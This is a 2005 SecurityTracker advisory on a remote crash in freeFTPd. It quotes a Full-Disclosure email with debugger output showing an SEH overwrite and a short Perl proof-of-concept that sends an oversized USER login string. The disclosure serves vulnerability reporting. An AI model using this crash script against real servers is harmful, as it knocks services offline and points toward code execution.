SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   freeFTPd Vendors:   freeftpd.com
freeFTPd Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1015230
SecurityTracker URL:  http://securitytracker.com/id/1015230
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 16 2005
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in freeFTPd. A remote user can cause the service to crash.

A remote user can send a USER parameter with more than 1012 characters to cause the target FTP server to crash.

barabas mutsonline reported this vulnerability.

Impact:   A remote user can cause the FTP service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  freeftpd.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] freeftpd USER bufferoverflow

--===============0872246978==
Content-Type: multipart/alternative; 
	boundary="----=_Part_11637_1705406.1132135014851"

------=_Part_11637_1705406.1132135014851
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hi,
 While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of m=
y
freeftpd server (which i use to backup my Adriana Lima pics). Guess
what...the server crashed! Luckily I attach ollydbg to every process I have
running and ths is what I found:
 ECX 50505050
 EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=3D77C460CB
Message=3DAccess violation when reading [50505050]
 77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
 well, eip doesnt get overwritten, but SEH does:

0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler

EIP 47464544

Log data, item 0
Address=3D47464544
Message=3DAccess violation when executing [47464544]
 I leave the exploit coding as an exercise...
 enjoy
 sample crash code:

#!/usr/bin/perl -w
#freeftpd USER buffer overflow
#barabas - 2005

use strict;
use Net::FTP;
my $user=3D"\x41"x1011;
$user .=3D"\x44\x45\x46\x47";#overwrite SEH
$user .=3D"\x50"x400;

my $ftp =3D Net::FTP->new("127.0.0.1 <http://127.0.0.1>", Debug =3D> 1);
$ftp->login("$user","whatevah");

------=_Part_11637_1705406.1132135014851
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

<div>Hi,</div>
<div>&nbsp;</div>
<div>While drooling over my new Adriana Lima wallpaper, my tongue accidenta=
lly hit my keyboard and more than 1012 chars were sent to the login screen =
of my freeftpd server (which i use to backup my Adriana Lima pics). Guess w=
hat...the server crashed! Luckily I attach ollydbg to every process I have =
running and ths is what I found:
</div>
<div>&nbsp;</div>
<div>ECX 50505050<br>&nbsp;</div>
<div>EIP 77C460CB msvcrt.77C460CB<br>Log data, item 0<br>&nbsp;Address=3D77=
C460CB<br>&nbsp;Message=3DAccess violation when reading [50505050]<br>&nbsp=
;</div>
<div>77C460CB&nbsp;&nbsp; 8B01&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp; MOV EAX,DWORD PTR DS:[ECX]</div>
<div>&nbsp;</div>
<div>well, eip doesnt get overwritten, but SEH does:</div>
<div>&nbsp;</div>
<div>
<p>0012B6CC&nbsp;&nbsp; 41414141<br>0012B6D0&nbsp;&nbsp; 42424242<br>0012B6=
D4&nbsp;&nbsp; 42424242<br>0012B6D8&nbsp;&nbsp; 43434343&nbsp; Pointer to n=
ext SEH record<br>0012B6DC&nbsp;&nbsp; 47464544&nbsp; SE handler</p>
<p>EIP 47464544</p>
<p>&nbsp;Log data, item 0<br>&nbsp;Address=3D47464544<br>&nbsp;Message=3DAc=
cess violation when executing [47464544]<br></p></div>
<div>&nbsp;I leave the exploit coding as an exercise...</div>
<div>&nbsp;</div>
<div>enjoy</div>
<div>&nbsp;</div>
<div>sample crash code:</div>
<div>&nbsp;</div>
<div>
<p>#!/usr/bin/perl -w<br>#freeftpd USER buffer overflow<br>#barabas - 2005<=
/p>
<p>use strict;<br>use Net::FTP;<br>my $user=3D&quot;\x41&quot;x1011;<br>$us=
er .=3D&quot;\x44\x45\x46\x47&quot;;#overwrite SEH<br>$user .=3D&quot;\x50&=
quot;x400;</p>
<p>my $ftp =3D Net::FTP-&gt;new(&quot;<a href=3D"http://127.0.0.1">127.0.0.=
1</a>&quot;, Debug =3D&gt; 1);<br>$ftp-&gt;login(&quot;$user&quot;,&quot;wh=
atevah&quot;);</p>
<p><br>&nbsp;</p></div>

------=_Part_11637_1705406.1132135014851--

--===============0872246978==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============0872246978==--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC